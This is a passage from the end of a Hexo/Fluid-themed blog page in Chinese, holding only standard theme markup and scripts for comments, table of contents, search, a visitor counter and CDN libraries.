                Fluid.plugins.fancyBox(imgSelector);
              });
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  var relativeDate = function() {
    var updatedTime = document.getElementById('updated-time');
    if (updatedTime) {
      var text = updatedTime.textContent;
      var reg = /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:Z|[+-]\d{2}:\d{2})/;
      var matchs = text.match(reg);
      if (matchs) {
        var relativeTime = moment(matchs[0]).fromNow();
        updatedTime.textContent = text.replace(reg, relativeTime);
      }
      updatedTime.style.display = '';
    }
  };
  Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/moment.min.js', function() {
    if (!'zh-cn'.startsWith('en')) {
      Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/locale/zh-cn.min.js', function() {
        relativeDate();
      });
    } else {
      relativeDate();
    }
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
